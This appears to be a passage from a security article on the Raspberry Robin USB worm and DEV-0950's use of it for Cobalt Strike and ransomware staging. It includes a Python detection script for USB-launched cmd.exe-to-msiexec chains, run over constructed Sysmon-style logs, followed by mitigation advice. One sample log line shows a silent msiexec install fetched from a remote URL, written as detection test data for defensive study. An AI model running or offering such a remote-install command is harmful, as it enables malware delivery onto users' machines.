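The chain described above (USB volume attached, cmd.exe runs something from the new drive, msiexec spawned) is something a SOC can correlate from ordinary endpoint telemetry. The following is an added example, not Microsoft's detection logic: it runs over constructed Sysmon-style process events and a simplified, assumed `usb_arrival` record, and flags msiexec.exe launched by cmd.exe within a short window of a removable volume appearing on the same host, when the parent command line references that drive letter. The field names Image, ParentImage, CommandLine and ParentCommandLine follow Sysmon Event ID 1; the host names, drive letters, timestamps and command lines are constructed.

```python
"""Added example, not from the article or Microsoft: correlate a removable-volume
arrival with a cmd.exe -> msiexec.exe chain on the same host. Sample telemetry
below is constructed, one JSON record per line."""
import json
import re
from datetime import datetime, timedelta
from typing import Dict, List

SAMPLE_LOG = r"""
{"ts": "2022-10-20T09:00:00", "type": "usb_arrival", "host": "ws01", "drive": "E:"}
{"ts": "2022-10-20T09:00:05", "type": "process", "host": "ws01", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /R E:\\setup.cmd", "ParentCommandLine": "explorer.exe"}
{"ts": "2022-10-20T09:00:07", "type": "process", "host": "ws01", "Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "msiexec /q /i http://example.invalid/pkg.msi", "ParentCommandLine": "cmd.exe /R E:\\setup.cmd"}
{"ts": "2022-10-20T09:10:00", "type": "process", "host": "ws02", "Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "msiexec /i C:\\deploy\\agent.msi /qn", "ParentCommandLine": "cmd.exe /c C:\\deploy\\install.cmd"}
{"ts": "2022-10-20T09:20:00", "type": "usb_arrival", "host": "ws03", "drive": "F:"}
{"ts": "2022-10-20T09:20:30", "type": "process", "host": "ws03", "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe F:\\notes.txt", "ParentCommandLine": "explorer.exe"}
{"ts": "2022-10-20T10:30:00", "type": "process", "host": "ws03", "Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "msiexec /i F:\\tool.msi", "ParentCommandLine": "cmd.exe /c F:\\run.cmd"}
"""


def parse_log(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _references_drive(cmdline: str, drive: str) -> bool:
    """True if `cmdline` names a path on `drive` (e.g. 'E:\\...'), not merely the letter."""
    pattern = r"(?<![A-Za-z0-9])" + re.escape(drive) + r"\\"
    return re.search(pattern, cmdline, re.IGNORECASE) is not None


def detect_usb_msiexec_chains(events: List[Dict], window_s: int = 60) -> List[Dict]:
    """Alert on msiexec.exe whose parent is cmd.exe, when a removable volume arrived on
    the same host within `window_s` seconds and the cmd.exe command line points at it."""
    arrivals: Dict[str, List] = {}   # host -> [(timestamp, drive letter)]
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort as strings
        ts = datetime.fromisoformat(ev["ts"])
        host = ev["host"]
        if ev["type"] == "usb_arrival":
            arrivals.setdefault(host, []).append((ts, ev["drive"]))
            continue
        if ev["type"] != "process":
            continue
        if _basename(ev["Image"]) != "msiexec.exe" or _basename(ev["ParentImage"]) != "cmd.exe":
            continue
        parent_cmd = ev.get("ParentCommandLine", "")
        for arr_ts, drive in arrivals.get(host, []):
            age = ts - arr_ts
            if timedelta(0) <= age <= timedelta(seconds=window_s) and _references_drive(parent_cmd, drive):
                alerts.append({
                    "host": host,
                    "ts": ev["ts"],
                    "drive": drive,
                    "seconds_after_arrival": int(age.total_seconds()),
                    "parent_cmdline": parent_cmd,
                    "msiexec_cmdline": ev.get("CommandLine", ""),
                })
                break
    return alerts


def demo() -> List[Dict]:
    return detect_usb_msiexec_chains(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Of the four msiexec/notepad launches in the sample, only the ws01 chain fires: ws02's msiexec runs from a local deployment folder with no volume arrival, ws03's first process is not msiexec, and ws03's later msiexec is well outside the window. In a real deployment the arrival record would come from your EDR's or Windows' own device-arrival telemetry, and the window should be tuned to how quickly the automount and LNK execution happen in your fleet.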
Raspberry Robin's Connection
Microsoft Security Threat Intelligence Center (MSTIC) observed Raspberry Robin in October 2022, and itâs being used by DEV-0950, which is another actor who was also involved in the post-compromise activity.
DEV-0950 activity led to Cobalt Strike hands-on-keyboard compromises. The majority of DEV-0950's victims have traditionally been acquired via phishing scams.
However, the operators of DEV-0950 have moved to using Raspberry Robin instead of the traditional method. The advantage of this approach is that payloads can be delivered to existing infections and campaigns can move to the ransomware stage more quickly.
Mitigations
To mitigate the impact of this threat, defenders can apply the following mitigation measures:-
When mounting the drive, prevent autorun from being used and code from being executed.
Make sure the tamper protection setting is enabled in order to protect Microsoft Defender Antivirus from being interrupted by attacks.
It is very important to turn on cloud-delivered protection for Microsoft Defender Antivirus or your antivirus software counterpart if it supports the feature.
Block untrusted and unsigned processes that run from USB.
Scripts that may be obfuscated should be blocked from being executed.
It is imperative to block executable files from running unless they fulfill all the trusted criteria.
The local security authority subsystem of Windows should be protected against credential theft.